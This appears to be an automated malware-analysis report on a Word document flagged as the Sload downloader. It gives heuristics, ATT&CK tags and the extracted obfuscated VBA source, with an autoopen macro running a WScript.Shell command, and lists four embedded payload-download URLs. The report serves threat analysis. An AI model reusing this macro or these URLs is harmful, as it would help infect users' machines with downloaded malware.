Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen function that utilizes WScript.Shell and CreateObject to execute commands. The macros appear to be designed to download and execute a second-stage payload from the concatenated URL found in the embedded artifacts. The ClamAV detection and heuristic firings strongly indicate malicious downloader functionality.
Heuristics (9)

- ClamAV: Doc.Downloader.Sload-6815984-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6815984-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:

      Set hapticzw = SCSIwq
      turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
      Set Senioraj = calculatingwk

- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:

      Set hapticzw = SCSIwq
      turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
      Set Senioraj = calculatingwk

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:

      Attribute VB_Name = "HomeAutomotiveJewelerylw"
      Sub autoopen()
      Berkshirepk = Array(compressingqp, circuitpf, Cambridgeshireiv, mobileka, Marketingjj, integratedhj, Futurear)

- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs found in document text (OLE body):
  - http://ddd.nkalitin.ru/3ghp_#E]B]_77azuhj
  - http://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhj
  - http://ddd.li8stroy.ru/a8f8l_tnv#5CChj
  - http://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5954 bytes |

SHA-256: 7ab8b047479dc40419707c785183961edbbd672f529cb75f997e4839f1fdc52d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "lavenderto"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "CheckingAccounttc"
Function mobileka()
On Error Resume Next
Set Avonct = backingupnc
For Each Awesomeis In NewTaiwanDollarjt
For Each paymenthc In redefineuw
Coveszp = (Oct(370))
Next
Do
NewJerseytq = CLng(zeroadministrationfw)
Loop Until valueaddedmw Eqv Bordersum
Set Handcraftedhj = Steelii
strategichr = bandwidthtv
For Each Pennsylvaniacs In generatinguz
overridingwh = Cos(evenkeeledcw)
Next
Next
Set compresssm = bypassingnz
Set inputmh = Pennsylvaniaiz
For Each Configurationzs In cultivatezb
For Each Bordersoo In Assurancesh
IraqiDinarjv = (Oct(172))
Next
Do
IncredibleSoftShoeshj = CLng(hapticwh)
Loop Until Producersn Eqv violetsh
Set depositcj = Ridgeshw
Opensourceqq = monetizess
For Each IntelligentFreshTablejk In middlewarefj
groupwareqw = Cos(CreditCardAccountln)
Next
Next
Set GraphicInterfacear = driverjk
Set bandwidthiq = CFPFrancwj
For Each GenericMetalHatif In Bordersrr
For Each Officerzw In FantasticFrozenPantsrh
Squareskb = (Oct(316))
Next
Do
PhilippinePesolh = CLng(backendqz)
Loop Until Mainekh Eqv Dividedn
Set bluetoothwt = Tunnelkc
Corporatekz = Nebraskani
For Each Representativeoj In Nationalmi
Configurablevj = Cos(generatemu)
Next
Next
Set hapticzw = SCSIwq
turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
Set Senioraj = calculatingwk
For Each monitorsu In Representativeui
For Each verticalww In Assistantiu
navigatingpz = (Oct(189))
Next
Do
virtualco = CLng(UAEDirhamww)
Loop Until Producerqw Eqv Cottontw
Set cyanrw = Massachusettsda
Programtm = Leonewc
For Each SouthAfricatf In backingupmn
foregroundoh = Cos(InvestmentAccountbr)
Next
Next
Set HandmadeSoftBallon = Avonoi
Set capacitoriq = benchmarkmh
For Each Shoreif In Industrialmk
For Each InvestmentAccountsc In Cottonvt
Rusticrw = (Oct(897))
Next
Do
connectingjr = CLng(reciprocalwi)
Loop Until solidstateki Eqv Millkj
Set contingencyhh = customizedqh
knowledgeuserpf = Programmablehc
For Each Buckinghamshirenj In transformhm
accesspw = Cos(turquoisedv)
Next
Next
Set Cornersci = ADPab
End Function
Attribute VB_Name = "HomeAutomotiveJewelerylw"
Sub autoopen()
Berkshirepk = Array(compressingqp, circuitpf, Cambridgeshireiv, mobileka, Marketingjj, integratedhj, Futurear)
End Sub
Attribute VB_Name = "Missionwa"
Attribute VB_Name = "TastySoftComputerwz"
Attribute VB_Name = "modelscz"
Attribute VB_Name = "systematictw"
Attribute VB_Name = "valueaddedjc"
Attribute VB_Name = "XSSij"
Attribute VB_Name = "Refinedik"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CheckingAccountnr"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "GorgeousConcretePantszj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "paymentpj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Woodenmz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hapticvw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "withdrawalvl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "mobilepa"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False